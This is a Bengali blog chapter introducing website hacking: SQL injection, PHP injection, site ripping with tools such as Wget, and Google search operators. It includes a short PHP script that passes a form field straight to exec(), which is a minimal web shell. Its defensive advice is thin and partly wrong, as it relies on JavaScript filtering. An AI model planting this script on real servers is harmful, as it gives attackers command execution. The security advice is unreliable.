অধ্যায়: ২০ বেসিক ওয়েবসাইট হ্যাকিং (তথ্য)-২

ওয়েব সার্ভারে আক্রমন করা :
1. SQL Injection
2. PHP Remote Code Execution
3. Web Ripping
4. Google Hacking

SQL Injection :
SQL Injection হচ্ছে একধরনের আক্রমন প্রক্রিয়া যাতে ফায়ারওয়াল দিয়ে রক্ষিত ডাটাবেসের ডাটা সমূহে টার্গেট করা হয়। এটা ওয়েব নির্ভর যেকোন এ্যাপ্লিকেশনের প্যারামিটার পরিবর্তনের চেষ্টা করে যা এসকিউএল নির্ভর কোন সার্ভারথেকে ডাটা সংরক্ষন করতে ব্যবহৃত হয়।
সাধারনত, প্রথম পদক্ষেপে এটা কোন আক্রমন উপযোগী ওয়েব এ্যাপ্লিকেশন অরক্ষিত করে। এই এ্যাটাকটি ঐ ওয়েব এ্যাপ্লিকেশনটির দুর্বল কোডিং এবং ওয়েবসাইট এডমিনের সুযোগ গ্রহন করে।
একটি SQL Injection এর মাধ্যমে কোন আক্রমন উপযোগী ওয়েব সার্ভারকে আক্রমনের মাধ্যমে এর কর্তৃত্ব নেয় যাতে করে ঐ সার্ভার ডাটাবেসের যেকোন তথ্য পড়া, পরিবর্তন করা বা মুছে দেয়া যায়।

ধারনা :
SQL Injection এ ইউজার SQL কোয়েরীতে স্থাপিত যেকোন ডাটার কন্ট্রোল নিতে পারে কোনরকম ডাটার শুদ্ধতা পরীক্ষা করা ছাড়াই। এর দ্বারাই ইন্টারনেটে প্রতিদিন হাজার হাজার ওয়েব এ্যাপ্লিকেশন ক্ষতিগ্রস্থ হচ্ছে। বর্তমানে ইন্টারনেটে প্রায় ৫০% বড় ই-কমার্স সাইট এবং ৭৫% ছোট ই-কমার্স সাইট এই আক্রমন উপযোগী। কোন ওয়েবসাইটে যদি CFML, ASP, JSP এবং PHP এর অসম ব্যবহার থাকে তাহলে ঐ সকর সাইট এই আক্রমনের উপযোগী।

SQL Injection এ ভ্যালিডেশন প্রবেশ করানো :
    SQL Injection আক্রমন প্রশমিত করার জন্য কিছু টুলস বা পরিকল্পনা রয়েছে।
    ওয়েব ডেভেলোপাররা লগইন পেজে কিছু সন্ধিগ্ধ কারেক্টার প্রবেশ করায়। যেমন: ‘, “, , , — ,
    ডাটাবেসে সবসময় পাসওয়ার্ডগুলো এনক্রিপ্ট করে রাখা
    এই পদ্ধতিগুলোর সঠিক ব্যবহারেও এসকিউএল প্রতিরোধ করা যায় না, কিন্তু এগুলো হ্যাকারের হ্যাকিং কার্য কঠিন করে দেয়।

PHP Injection :
এই আক্রমন কোন টার্গেট ওয়েব সার্ভারের সিস্টেম লেভেল ভেঙ্গে ফেলতে ব্যবহৃত হয়। এই আক্রমনের দরুন, হ্যাকার ওয়েবসার্ভারটিতে প্রবেশ করতে পারে এবং এর সমস্ত ফাইলের কর্তত্ব নিয়ে নিতে পারে।

Script :
1.<form action=" " method=post>
2.<input type=text name=command>
3.<input type=hidden name=filled value=1>
4.<input type=submit value="Run Command">
5.</form>
6.<?php
7.if($_post[filled]==1)
8.{
9.$output=exec("$_post[command]")
10.print $output;
11.}
12.?>

Counter Measure :
১। এটা আপনার সার্ভারে তথ্য সাপ্লাইয়ের পূর্বেই ইউজারের দেয়া তথ্যাদির সত্যাদি পরীক্ষা করে দেথে, এটা সাধারনত জাভাস্ক্রিপ্ট বা অন্য কোন ফিল্টারিং মাধ্যমে ব্যবহৃত হয়।

Web Ripping :
ওয়েব রেপিং কোন নির্দিষ্ট ওয়েবসাইটের ঠিকানা থেকে ছবি বা ইমেজ বা অন্যান্য মিডিয়া ফাইল খুজে বের করে তা এক্সট্রাক্ট করে এবং আপনার হার্ড ড্রাইভে তা সংরক্ষন করে রাখে। ওয়েব রেপিং কোন ওয়েবসাইটটির সম্পূর্ণ গঠন আপনার হার্ড ড্রাইভে সংরক্ষনের ক্ষমতা রাখে।

সাবধানতা : আপনি ওয়েবসাইটটির এডমিন কর্তৃক ধরা পড়ে যেতে পারেন কারন আপনিতো সেখানে একটি সাধারন ইউজার হিসেবে প্রবেশ করেছেন যাতে করে কর্তৃপক্ষ আপনার আইপি বাতিল করে দিতে পারে বা ঐ সার্ভারটি থেকে আপনার সংযোগ প্রকৃয়া কেটে দিতে পারে।
ওয়েব রেপিংয়ে ব্যবহৃত কিছু টুলস :
1). Black Widow.
2). Wget
3). Web Sleuth.

Google Hacking :
ইন্টারনেটের প্রায় ৮০ ভাগ সার্চ কোয়েরী আসে গুগলের সার্ভার থেকে। এটা বর্তমানে সর্বাপেক্ষা শক্তিশালী এবং জনপ্রিয় সার্চ ইঞ্জিনে পরিনত হয়েছে। এটার জনপ্রিয়তা এর সার্চ ক্ষমতা থেকেই আসে নি, বরং এটার কোয়েরী বা ইনডেক্সিং করার ক্ষমতা থেকেই এসেছে। যাহোক, আমাদের মনে রাখা উচিত যে, ইন্টারনেট হচেছ একটি উচ্চ ক্ষমতা সম্পন্ন মাধ্যম, যার কারনে গুগল যে রেজাল্টগুলো দেয় তা সবসময় আপ-টু-ডেট হয়না বা কিছু তথ্য হয়ত চুরি হয়ে যায়।এছাড়াও কিছু নিষিদ্ধ উপাদান গুগলবট (এটা গুগলের স্বয়ংক্রিয় স্ক্রিপ্ট যা ইন্টারনেটের সকল তথ্যাদি গুগল সার্ভারে জমা করে রাখে) দ্বারা ভিজিটও হয়না। আমরা জানি যে, গুগল একটা সার্চ ইঞ্জিন।

গুগলের কিছু নির্দিষ্ট ষ্ট্রিং বা কমান্ড দিয়ে সার্চের মাধ্যমে গুগল কর্তৃক হ্যাকিং কার্য সম্পন্ন করা হয়। যেটাকে গুগল এ্যাডভান্সড অপারেটর বলা হয়। এর মাধ্যমেই দৈনিক লাখো লাখো ওয়েবসাইট বের করা হয় যেগুলো হ্যাকিং আক্রমন উপযোগী।

প্রিয় বন্ধুরা, এই বাংলা ব্লগ-এ আপনারা পড়ছেন অধ্যায়: ২০ বেসিক ওয়েবসাইট হ্যাকিং (তথ্য)-২